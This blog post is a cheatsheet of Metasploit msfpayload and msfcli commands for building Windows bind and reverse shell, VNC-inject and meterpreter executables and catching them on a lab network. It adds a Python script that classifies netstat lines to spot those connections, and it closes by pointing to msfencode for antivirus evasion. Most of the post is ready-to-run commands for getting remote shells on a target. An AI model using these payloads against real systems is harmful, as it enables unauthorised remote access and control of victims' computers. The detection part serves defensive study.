Tuesday, November 24, 2009

msfpayload goodness (cheatsheet)

Like one of my favorite blogs, http://synjunkie.blogspot.com, this post is more of a reference for me, a cheatsheet if you will. There is so much to know and so little space to store it all in the head. Because msfpayload has been so good to me, I figure I'd do it a favour and spread some of its goodness again. This time, since it's been done before, instead of reinventing the wheel I'm just going to make a duplicate from synjunkie's blog. Here it is, your cheatsheet to gaining a shell, lol.

Victim, Windows: 192.168.1.110
Hacker, Linux: 192.168.1.112
Ports not specified in any example default to 4444.

1. For a listening shell on the target

Create payload:
./msfpayload windows/shell_bind_tcp LPORT=2482 X > /tmp/Listen-shell.exe

Target:
run Listen-shell.exe

Hacker:
nc 192.168.1.110 2482



2. For a reverse shell on the target

Create payload:
./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.112 X > /tmp/reverse-shell.exe

Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.112 E

Target:
run reverse-shell.exe



3. For a VNC listener on target

Create payload:
./msfpayload windows/vncinject/bind_tcp LPORT=2482 X > Listen-vnc.exe

Target:
run Listen-vnc.exe

Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/bind_tcp LPORT=2482 RHOST=192.168.1.110 DisableCourtesyShell=TRUE E



4. For a reverse VNC session

Create payload:
./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 X > /tmp/reverse-vnc.exe

Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 DisableCourtesyShell=TRUE E

Target:
run reverse-vnc.exe



5. For a meterpreter listener

Create payload:
./msfpayload windows/meterpreter/bind_tcp LPORT=2482 X > met-listen.exe

Target:
run met-listen.exe

Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=192.168.1.110 LPORT=2482 E



6. For a reverse meterpreter connection (not working yet, not sure why)

Create payload:
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.112 X > /tmp/met-reverse.exe

Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.112 E

Target:
run met-reverse.exe
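Reading the six items above from the target's side, they come in two shapes: the bind payloads (1, 3, 5) leave a listener open on the target, and the reverse payloads (2, 4, 6) make an outbound connection to the handler, on port 4444 unless LPORT was set. The following is an added example, not from synjunkie's post or from Metasploit, that sorts constructed Windows netstat lines into those two shapes using the addresses and ports from this post (the 203.0.113.5 peer is a made-up, benign connection):

```python
# Added example: classify lines from a Windows "netstat -ano" capture taken on
# the victim (192.168.1.110) into the two connection shapes in the cheatsheet.
# The netstat text below is constructed sample data, not a real capture.
import re

HANDLER_HOST = "192.168.1.112"   # the "hacker" box from the post
WATCH_PORTS = {2482, 4444}       # LPORT used in the post, plus the 4444 default

SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       776
  TCP    0.0.0.0:2482           0.0.0.0:0              LISTENING       1604
  TCP    192.168.1.110:1052     192.168.1.112:4444     ESTABLISHED     1788
  TCP    192.168.1.110:1053     203.0.113.5:80         ESTABLISHED     2012
"""

# Proto, local addr:port, foreign addr:port, state, PID (TCP rows only)
LINE_RE = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\w+)\s+(\d+)\s*$")


def classify_netstat(text, handler_host=HANDLER_HOST, watch_ports=WATCH_PORTS):
    """Return (pid, kind, endpoint) for rows matching either payload shape."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # header line or non-TCP row
        laddr, lport, raddr, rport, state, pid = m.groups()
        lport, rport, pid = int(lport), int(rport), int(pid)
        # Items 1, 3, 5: a bind payload leaves the target listening on LPORT.
        if state == "LISTENING" and lport in watch_ports:
            findings.append((pid, "bind-style listener", f"{laddr}:{lport}"))
        # Items 2, 4, 6: a reverse payload connects out to the handler's LHOST:LPORT.
        elif state == "ESTABLISHED" and (raddr == handler_host or rport in watch_ports):
            findings.append((pid, "reverse-style outbound", f"{raddr}:{rport}"))
    return findings


if __name__ == "__main__":
    for pid, kind, endpoint in classify_netstat(SAMPLE_NETSTAT):
        print(f"PID {pid}: {kind} at {endpoint}")
```

The PID column is what you would carry over to a process listing to see which binary owns the socket.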

As noted by synjunkie, all these payloads would be detected by most anti-virus systems. I'll save methods of evading the AV vendors for another post, but you can take a look at msfencode in the meantime to get an idea of where to start your research.

References/Good reading:
http://synjunkie.blogspot.com/2008/10/metasploit-payloads-msfpayload.html
